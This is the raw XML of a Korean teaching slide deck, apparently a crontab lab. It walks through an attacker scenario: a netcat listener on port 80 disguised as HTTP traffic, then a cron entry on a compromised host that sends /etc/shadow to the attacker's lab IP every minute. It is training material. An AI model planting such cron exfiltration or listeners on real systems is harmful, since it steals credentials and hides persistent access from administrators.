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4" r:id="rId2"/>
    <p:sldId id="329" r:id="rId3"/>
    <p:sldId id="33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crontab</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>설정</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>_LAB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2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crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 설정 실</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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crontab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87941"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467543" y="1293368"/>
          <a:ext cx="8352928" cy="2664296"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8352928"/>
              </a:tblGrid>
              <a:tr h="399323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시나리오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악의적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해커가 희생자의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에서 중요 자료를 주기적으로 자료를 빼내기 위한 설정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64973"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# yum –y install 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		               (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 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>네트워크 관련 프로그램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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t># rpm –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>qa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> |</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>grep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ncat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>-		               (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ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>설치여부 확인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endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t># </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>ifconig</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> |</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>grep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inet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>		                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해커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ip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ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> 할 것</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>!)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> ipv4 192.168.100.131</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p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systemctl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stop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firewalld</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>		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★해커 서버 방화벽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(F/W)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꼭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꺼야함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★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200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>#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 –l 80</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>(listening </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>서버로 만듦</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>, 80</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>번 포트이용</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>)		(backtrack </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>설정 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>: #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 –l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–p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> 80 )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988" y="874937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악의적 해커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PC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723" y="4077072"/>
            <a:ext cx="8122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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>해커가 목적지 포트를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>번으로 하는 이유 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>일반적인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP(port:80) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>트래픽으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 위장하여 관리자가 쉽게 알아채지 못하게 하기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>위함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2703"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="464400" y="4860822"/>
          <a:ext cx="8359214" cy="855712"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8359214"/>
              </a:tblGrid>
              <a:tr h="288032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새 터미널 열어서 서버가 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listen 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상태인지 확인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7680"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#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>netstat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>  -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>antup</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> | </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>grep</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> :80</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>tcp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> 0 0.0.0.0:80  0.0.0.0:*  Listen  1949/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   (-&gt;1949nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>라는 프로그램이 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>80</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>포트를 열고 있음 확인 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>=&gt; C&amp;C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>서버역할</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1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9723" y="5775295"/>
            <a:ext cx="8368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※ C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Command &amp; Control)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>일반적으로 감염된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>좀비</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>가 해커가 원하는 공격을 수행하도록 원격지에서 명령을 내리거나 악성코드를 제어하는 서버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 smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 설정 실</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>crontab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64273"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467543" y="1293368"/>
          <a:ext cx="8352928" cy="2207640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8352928"/>
              </a:tblGrid>
              <a:tr h="352465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시나리오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: root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권한 탈취당해 해커가 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</a:rPr>
                        <a:t>crontab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수정이 가능 한 상황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55175"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# yum –y install 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		(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 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>네트워크 관련 프로그램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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t># rpm –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>qa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> |</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>grep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en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>ncat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>-		(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ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>설치여부 확인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endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/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</a:rPr>
                        <a:t>crontab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 –e</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>  * * * * *  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>  192.168.100.131  80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sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>/shadow</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>(-&gt; /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>/shadow </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>내용을  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>192.168.100.131 80 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>포트로 입력 값으로 전송 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>(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sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t> : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>입력 재지정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1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988" y="874937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-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희생자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PC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6988" y="3789040"/>
            <a:ext cx="8122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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>crontab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으로 설정된 내용의 의미 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p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/>
              <a:t>* * * * *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0"/>
              <a:t>  192.168.100.131  80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>/shadow  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0"/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/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>내용을  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0"/>
              <a:t>192.168.100.131 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>포트로 입력 값으로 전송 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>재지정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10526"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="464400" y="4860822"/>
          <a:ext cx="8359214" cy="855712"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8359214"/>
              </a:tblGrid>
              <a:tr h="288032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새 터미널 열어서 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</a:rPr>
                        <a:t>cron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로그 확인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7680">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>#tail –f /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>cron</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>	(-&gt;log </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>확인</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1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187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209</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-02T13:04:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-26T01:10:02Z</dcterms:modified>
</cp:coreProperties>
</file>